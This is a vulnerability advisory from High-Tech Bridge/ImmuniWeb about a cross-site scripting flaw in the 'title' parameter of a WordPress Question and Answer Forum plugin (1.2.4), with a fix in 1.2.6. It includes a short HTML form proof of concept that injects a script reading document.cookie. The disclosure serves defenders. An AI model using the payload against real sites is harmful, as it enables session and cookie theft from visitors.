Total Tests:

Cross-site Scripting (XSS) Vulnerability in Question and Answer Forum

Advisory ID:HTB22861
Product:Question and Answer Forum wordpress plugin
Vendor:David Woodford
Vulnerable Versions:1.2.4 and probably prior
Tested Version:1.2.4
Advisory Publication:February 15, 2011 [without technical details]
Vendor Notification:February 15, 2011
Public Disclosure:March 1, 2011
Vulnerability Type:Cross-Site Scripting [CWE-79]
Risk Level:Medium
CVSSv2 Base Score:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Question and Answer Forum WordPress plugin which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerability in Question and Answer Forum
The vulnerability exists due to input sanitation error in the "title" parameter in wp-content/plugins/question-and-answer-forum/askquestionform.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action="http://wordpress/?page_id=[page_id]" method="post" name="main" >
<input type="hidden" name="title" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="submit" name="submit" />
</form>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to version 1.2.6.


References:
[1] High-Tech Bridge Advisory HTB22861 - https://www.immuniweb.com/advisory/HTB22861 - Cross-site Scripting (XSS) Vulnerability in Question and Answer Forum
[2] Question and Answer Forum - trevorpythag.co.uk - Question and Answer Forum WordPress plugin that allows a question and answer forum to be added to a site/blog.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential